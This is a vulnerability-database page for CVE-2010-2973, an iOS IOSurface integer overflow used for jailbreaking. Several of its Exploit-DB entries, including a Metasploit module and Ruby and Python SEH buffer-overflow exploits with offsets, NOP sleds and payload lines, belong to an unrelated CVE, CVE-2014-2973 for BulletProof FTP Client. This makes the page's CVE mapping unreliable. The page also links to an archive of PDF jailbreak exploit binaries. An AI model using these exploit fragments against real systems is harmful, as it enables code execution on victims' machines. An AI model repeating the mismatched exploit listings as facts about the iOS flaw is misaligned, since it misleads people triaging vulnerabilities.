CVE-2010-2973
published 2010-08-05CVE-2010-2973: Integer overflow in IOSurface in Apple iOS before 4.0.2 on the iPhone and iPod touch, and before 3.2.2 on the iPad, allows local users to gain privileges via…
PriorityP426medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
0.78%
51.3th percentile
Integer overflow in IOSurface in Apple iOS before 4.0.2 on the iPhone and iPod touch, and before 3.2.2 on the iPad, allows local users to gain privileges via vectors involving IOSurface properties, as demonstrated by JailbreakMe.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | iphone_os | — | — |
| apple | iphone_os | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
exploitdb·2015-01-06
CVE-2014-2973 BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'BulletProof FTP Client BPS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan'
],
'References' =>
[
[ 'EDB', '34162' ],
[ 'EDB', '34540' ],
[ 'EDB', '35449' ],
[
Exploit-DB
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
exploitdb·2014-12-03·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack using memcpy function.
# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 400
# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_
Exploit-DB
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
exploitdb·2014-09-05·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
---
# !/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
# Date: Sep 05 2014 #
# Vulnerability Discovery: Gabor Seljan #
# Exploit Author: Robert Kugler #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP #
# CVE: CVE-2014-2973 #
# #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
# The "Enter URL" form is also vulnerable #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
Exploit-DB
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
exploitdb·2014-07-24·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Jul 24 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 #
# CVE: CVE-2014-2973 #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001
Exploit-DB
Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'
exploitdb·2010-08-03
CVE-2010-2973 Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'
Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'
---
The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14538.7z (ios_pdf_exploit.7z)
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2010//Aug/msg00000.htmlhttp://lists.apple.com/archives/security-announce/2010//Aug/msg00001.htmlhttp://osvdb.org/66827http://secunia.com/advisories/40807http://support.apple.com/kb/HT4291http://support.apple.com/kb/HT4292http://www.exploit-db.com/exploits/14538http://www.securityfocus.com/bid/42151http://lists.apple.com/archives/security-announce/2010//Aug/msg00000.htmlhttp://lists.apple.com/archives/security-announce/2010//Aug/msg00001.htmlhttp://osvdb.org/66827http://secunia.com/advisories/40807http://support.apple.com/kb/HT4291http://support.apple.com/kb/HT4292http://www.exploit-db.com/exploits/14538http://www.securityfocus.com/bid/42151
2010-08-05
Published